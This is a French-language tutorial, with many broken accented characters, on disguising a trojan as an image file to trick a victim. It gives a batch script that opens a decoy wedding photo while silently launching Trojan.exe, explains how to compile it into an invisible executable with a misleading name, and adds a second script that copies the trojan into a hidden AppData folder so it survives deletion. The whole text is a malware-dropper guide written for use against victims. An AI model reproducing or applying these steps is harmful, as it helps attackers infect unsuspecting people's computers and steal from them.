Vous êtes sur la page 1sur 2

Je vous propose aujourd'hui un petit tutoriel qui consiste � binder une image

dans un serveur simplement avec un petit script ,

Sujet cach� !

Dans ce tuto, nous allons voir comment masquer un ex�cutable (trojan, logger
etc �) dans une image. Je pr�cise une chose, il faut n�anmoins �tre un demeur� pour
se faire avoir, vous comprendrez pourquoi. La premi�re question qui vient :

� Comment peut-on mettre un logiciel dans une image ? Ce n�est pas possible. Un
jpg n�est pas un ex�cutable �
C�est parce qu�il faut prendre le probl�me d�une autre mani�re et donc se
demander � Comment faire passer un ex�cutable pour une image ? �
Nul besoin d��tre expert en programmation (de simples bases suffisent) pour
faire et surtout comprendre cela.

On va tout simplement cr�er un ex�cutable qui lancera et l�image et le trojan

1 - Commen�ons par construire notre dossier.


- Une image (.png,.jpg etc�) : ici Mariage.jpg
- Un ex�cutable malveillant. : ici Trojan.exe
Pour l�instant ces deux fichiers n�ont rien � voir l'un avec l�autre et son
ind�pendants. On doit donc cr�er un petit script que l�on appellera le � script
racine � pour qu�ils s�ouvrent ou s�ex�cutent lorsque la victime lancera le script
racine.

2 - Ouvrez donc notepad ou bloc note et �crivez ceci (en mettant vos noms de
fichiers) :

@echo off
Start Mariage.jpg
Start Trojan.exe
End.

Lorsque vous enregistrez le fichier (donnez lui un nom passe partout genre
�Photo du mariage de Pauline et Paul �), n�oubliez surtout pas de mettre � la fin �
.bat �.
ATTENTION : toujours mettre l�image en premier.
(pour rappel �@Echo off� emp�che d�afficher le script � l��cran et donc � la
victime de se douter de quoique ce soit.)

3 � Cr�ons notre joint-venture Image/Exe.

T�l�chargez � Bat to exe converter � ici . Ouvrez le.


Dans � batch file �, mettez le batch � Photo du mariage de Pauline et Paul �.
Dans options, cochez � Invisible application �.
Dans � Working directory �, cochez �Temporary directory�
Dans �Temporary Files�, cochez �Do not Delete�.
Maintenant, allez dans l�onglet �Include�. Cliquez sur Add et ins�rez votre
image, ici Mariage.jpg et votre .exe, ici Trojan.exe.

ATTENTION : L�image doit �tre en premi�re position, sinon l�executable vous


signalera une erreur.
Une fois tout cela fait, cliquez sur 'Compile'. Il va cr�er un ex�cutable �
Photo du mariage de Pauline et Paul �. Le tout est jou�.
Alors malheureusement, l�ic�ne qui apparait est l�ic�ne de l�executable, d�o�
ma remarque au d�but comme quoi pour se faire avoir, il fallait ne pas �tre
prudent. Et pourtant, la plupart se feront avoir, car lorsque l�on clique, magie,
l�image appara�t
. Enfin, si la signature du trojan est dans les bases de donn�es de l'anti-
virus, l'AV d�tectera votre virus.
Note : vous pouvez mettre tout et n�importe quoi dans le script racine (sous
respect d�un bon codage). Par exemple pourquoi ne pas demander au script de
d�placer le trojan dans un dossier que l�on aurait cr�e pour l�occasion enfoui
profond�ment dans le disque dur pour pallier au fait que la victime supprimera
certainement votre � photo �.

je vous donne le script. , retournez � l��tape deux et inscrivez ceci dans


votre script racine (ensuite refaites l��tape 3) :

@echo off
Start Mariage.jpg
md C:\Users\%USERNAME%\AppData\Roaming\Nomdunouveaudossier
copy Trojan.exe C:\Users\%USERNAME%\AppData\Roaming\ Nomdunouveaudossier
start C:\Users\%USERNAME%\AppData\Roaming\ Nomdunouveaudossier \Trojan.exe
Start Trojan.exe
End.

- Ne remplacez surtout pas � %USERNAME % �.